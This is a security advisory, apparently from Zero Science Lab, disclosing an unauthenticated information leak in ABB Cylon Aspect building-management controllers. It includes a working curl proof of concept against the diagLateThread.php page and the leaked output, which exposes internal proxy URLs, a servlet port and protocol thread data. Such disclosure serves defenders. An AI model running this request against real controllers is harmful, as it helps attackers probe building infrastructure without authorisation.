ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure
ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various protocol thread information running on the device.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience
Advisory ID: ZSL-2024-5864
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php
21.04.2024
—
$ cat project
P R O J E C T
.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d “Summary Thread”
7: <title>Thread Class Status</title>
47: #ProjectThreadStatus {
127: var url =’//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson’;
128: var directUrl =’//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json’;
203: $.getJSON(url, processThreadInfo);
204: //$.getJSON(directUrl, processThreadInfo);
248: //infoText = “<div><h2 class=’summaryHeading’>”+targetClass+” Class Summary</h2></div><div class=’hideable’><div class=’summaryInfo’></div>
306: function processThreadInfo(json) {
308: getClassStats(json, PUP_STR, pupLateTime, “PUPLateTable”, “pupSummary”);
309: getClassStats(json, BACNET_STR, bacnetLateTime, “BACnetLateTable”, “bacnetSummary”);
310: getClassStats(json, SDP_STR, sdpLateTime, “SDPLateTable”, “sdpSummary”);
311: getClassStats(json, SCHEDULE_STR, scheduleLateTime, “ScheduleLateTable”, “scheduleSummary”);
312: getClassStats(json, DEFAULT_STR, defaultLateTime, “DefaultLateTable”, “defaultSummary”);
315: $(“#ProjectThreadStatus”).empty();
316: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’><h2>Thread Status at ” + systemTime.toTimeString() + “</h2></div>”);
317: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’>Total Timers: ” + json.totalTimers + “</div>”);
318: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’>Total Targets: ” + json.totalTargets + “</div>”);
323: var warningTime = (timebase * 1000) * threadWarnPercent;
324: var errorTime = (timebase * 1000) * threadErrorPercent;
534: <div id=”ProjectThreadStatus”></div>
537: <div class=’infoSection ThreadDiv’ id=”bacnetInfo”>
538: <div id=”bacnetHeading”><h2>BACnet Summary</h2>
541: <div id=”bacnetSummary”></div>
550: <div class=’infoSection ThreadDiv’ id=”pupInfo”>
551: <div id=”pupHeading”><h2>PUP Summary</h2>
554: <div id=”pupSummary”></div>
563: <div class=’infoSection ThreadDiv’ id=”sdpInfo”>
564: <div id=”sdpHeading”><h2>SDP Summary</h2>
567: <div id=”sdpSummary”></div>
576: <div class=’infoSection ThreadDiv’ id=”scheduleInfo”>
577: <div id=”scheduleHeading”><h2>Schedule Summary</h2>
580: <div id=”scheduleSummary”></div>
589: <div class=’infoSection ThreadDiv’ id=”defaultInfo”>
590: <div id=”defaultHeading”><h2>Default Summary</h2>
593: <div id=”defaultSummary”></div>